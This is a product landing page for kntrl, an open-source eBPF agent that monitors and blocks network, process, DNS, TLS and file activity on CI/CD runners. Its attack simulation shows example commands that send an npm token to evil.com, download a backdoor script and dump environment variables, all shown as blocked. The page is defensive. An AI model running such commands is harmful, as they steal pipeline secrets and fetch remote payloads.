eBPF-powered kernel-level security

Runtime Security
for CI/CD Pipelines

Open-source eBPF agent that monitors network, process, DNS, and file activity on CI/CD runners. Detect and block supply chain attacks in real-time at the kernel level.

View on GitHub How It Works
kntrl trace mode — attack simulation
# Malicious npm postinstall tries to exfiltrate tokens
$ npm install evil-package
[postinstall] Attempting: curl https://evil.com/exfil?t=$NPM_TOKEN
BLOCKED curl -> evil.com:443 (ancestry: npm > node > sh > curl)
BLOCKED wget -> evil.com:80 (ancestry: npm > node > sh > wget)
BLOCKED python3 credential harvester (ancestry: npm > python3)

# Legitimate workflow traffic passes through
$ npm install express
PASS npm -> registry.npmjs.org:443 (tcp)
PASS pip -> pypi.org:443 (tcp)
PASS git -> github.com:443 (tcp)
11
eBPF Programs
5
Protection Layers
<1ms
Policy Evaluation
0
Dependencies
Protection Layers

Multi-layer kernel-level defense

kntrl attaches eBPF programs to kernel hooks, giving you deep visibility and enforcement across network, process, DNS, TLS, and file activity — all from a single binary.

Network Monitoring & Enforcement

Intercept IPv4/IPv6 TCP and UDP connections via eBPF kprobes. Block based on destination IP, domain, CIDR range, and process identity. Per-process network profiles let you restrict what each tool can access.

IPv4 / IPv6 TCP / UDP CIDR ranges Process profiles

Process Ancestry Tracking

Build a real-time process tree from fork/exec events. Block suspicious chains like npm→node→curl that indicate postinstall script attacks. Track full ancestry for every event.

fork / exec Blocked chains Process tree SIGKILL

DNS Monitoring

Capture DNS queries and responses at the kernel level. Track which domains each process resolves, restrict DNS server usage, and populate the forward DNS cache for accurate connection attribution.

Query / Response Server restriction Forward cache

TLS SNI Inspection

Extract Server Name Indication from TLS ClientHello packets via eBPF cgroup hooks. Enable domain-based policy enforcement even for encrypted traffic without breaking TLS.

ClientHello parsing In-kernel Cgroup SKB

File & Secrets Monitoring

Monitor access to sensitive paths (SSH keys, cloud credentials, Kubernetes secrets). Protect critical system files from writes. Detect environment variable inheritance at exec time.

SSH / AWS / GCP Write protection Env vars

OPA Policy Engine

All decisions flow through an embedded Open Policy Agent with Rego rules. Extend policies with custom .rego files. Cached evaluation with 30-second TTL for zero overhead on hot paths.

Rego rules Custom policies Cached eval SIGHUP reload
How It Works

From kernel hooks to policy decisions

kntrl uses eBPF to observe system activity at the kernel level, evaluates events against OPA policies in userspace, and enforces decisions back through BPF maps.

Attach eBPF probes

11 eBPF programs attach to kprobes, tracepoints, and cgroup hooks at startup. Zero kernel modules, zero dependencies — just a single static binary.

Capture events

Kernel-side programs emit events through 6 ring buffers: network (IPv4/IPv6), DNS, process (fork/exec), file access, and TLS SNI extraction.

Evaluate policies

Userspace goroutines read each ring buffer, enrich events with process ancestry and DNS context, then evaluate against the OPA policy engine.

Enforce decisions

Passing connections get their IP added to BPF allow maps. Blocked process chains receive SIGKILL. The cgroup egress filter drops packets to unauthorized destinations.

Kernel Space
kprobe: tcp_connect
kprobe: udp_sendmsg
tracepoint: sched_exec
tracepoint: openat
cgroup_skb: egress
Userspace (kntrl)
Ring Buffer Reader
Process Tree
DNS Cache
OPA Policy Engine
Reporter
Actions
Update BPF allow maps
SIGKILL blocked process
JSON report
Webhook alerts
Cloud upload
Supply Chain Protection

Stop Poisoned Pipeline Execution

When a malicious npm postinstall or pip setup.py tries to exfiltrate tokens or download payloads, kntrl detects the suspicious process chain and blocks it at the kernel level.

Attack: npm postinstall exfiltration
npm install malicious-pkg
  postinstall → node script.js
    node → sh -c "curl ..."
      curl https://evil.com/exfil?t=$NPM_TOKEN
    node → wget payload
      wget https://evil.com/backdoor.sh
    node → python3 harvester
      python3 -c "import os; print(os.environ)"
kntrl: all attacks blocked
Process chain: npm > node > curl
  BLOCKED curl → evil.com:443
  BLOCKED ancestry match: ["npm","node"]

Process chain: npm > node > wget
  BLOCKED wget → evil.com:80

Process chain: npm > python3
  BLOCKED python3 (ancestry: npm)

Network: evil.com not in allowed hosts
  BLOCKED cgroup egress filter
GitHub Action

Two lines to secure your pipeline

Add kntrl to any GitHub Actions workflow with built-in defaults for npm, pip, GitHub, and common CDNs. No configuration required for monitor mode.

Built-in defaults

Pre-configured allowlists for npm, PyPI, GitHub, Cloudflare, and Fastly. Default blocked chains for postinstall attacks. DNS server restrictions.

Toggle everything

Enable or disable each protection layer independently: network, process, DNS, file, and OPA supply chain rules. Add custom overrides per-input.

Rich reporting

Automatic stop action produces summary tables with event counts, blocked connections, process ancestry chains, and file access details.

Custom rules

Bring your own YAML rules files, directories, or .rego policies. Define per-process network profiles, additional blocked chains, and custom alerting via webhooks.

.github/workflows/build.yml
name: Secure Build
on: [push, pull_request]

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      # Start kntrl before anything else
      - uses: kondukto-io/kntrl-action@v1
        with:
          mode: trace

      - uses: actions/checkout@v4
      - run: npm install && npm test

      # Stop kntrl and print report
      - uses: kondukto-io/kntrl-action/stop@v1
        if: always()
Deployment

Single binary. Zero dependencies.

kntrl compiles eBPF programs into the binary at build time using bpf2go. No kernel headers, no DKMS, no containers — just drop the binary and run.

quick start
# Download
$ curl -fsSL -o kntrl \
    github.com/kondukto-io/kntrl/releases/latest/download/kntrl.amd64
$ chmod +x kntrl

# Monitor mode (log only)
$ sudo ./kntrl start --mode monitor

# Trace mode (enforce policy)
$ sudo ./kntrl start --mode trace --rules-dir ./rules/